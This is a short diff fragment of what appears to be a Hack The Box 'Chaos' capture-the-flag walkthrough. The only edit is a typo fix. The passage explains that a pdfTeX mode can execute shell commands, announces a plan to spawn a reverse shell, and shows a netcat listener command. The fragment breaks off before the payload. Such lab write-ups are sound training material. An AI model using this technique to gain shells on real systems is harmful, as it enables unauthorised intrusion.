jcseals/jcseals.github.io/_posts/2019-05-25-htb-chaos-walkthrough.md

   ```

 ## Exploitation
 I started to search around for that mode and what it does.
 Turns out it allows pdfTeX to execute shell commands.
 That sounds useful for an attacker...
 So, if it'll run commands for me, let's have it run a reverse shell that will connect back to my listener.
-First, I setup my listener on my local machine:
+First, I set up my listener on my local machine:

 ```text
 ~/ctf/htb/chaos λ nc -l -n -v -p 9002